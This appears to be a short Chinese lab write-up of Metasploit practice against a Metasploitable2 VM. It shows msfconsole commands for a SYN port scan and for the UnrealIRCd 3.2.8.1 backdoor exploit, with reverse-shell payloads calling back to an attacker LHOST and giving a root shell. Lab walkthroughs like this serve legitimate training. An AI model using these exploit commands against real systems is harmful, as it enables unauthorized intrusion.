第10章 metasploit(网络安全防御实战--蓝军武器库)
网络安全防御实战--蓝军武器库是2020年出版的,已经过去3年时间了,最近利用闲暇时间,抓紧吸收,总的来说,第10章开始学习利用metasploit渗透测试工具去打metasploit2虚拟机,本文我演示了metasploit端口扫描和漏洞利用,更多有趣的渗透测试实验,有待大家挖掘~
- ailx10:metasploit渗透测试入门
- ailx10:使用metasploit获取域散列值
- ailx10:Meterpreter渗透测试入门
ailx10
网络安全优秀回答者
互联网行业 安全攻防员
去咨询
1、启动metasploitable2虚拟机,拿到IP地址(192.168.85.171)
2、访问web页面,里面有很多白帽子黑客练习的靶场
3、使用root 身份 运行 kali 的 msfconsole ,对metasploitable2进行syn端口扫描
search portscan
use auxiliary/scanner/portscan/syn
set RHOSTS 192.168.85.171
4、查看syn端口扫描结果,体验很慢,不如 nmap
5、漏洞利用,直接帮忙提权到root了,成功获得metasploitable2 后门
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOSTS 192.168.85.171
set payload generic/shell_reverse_tcp
set payload cmd/unix/reverse
set lhost 192.168.85.23
run
编辑于 2023-03-24 21:47・IP 属地江苏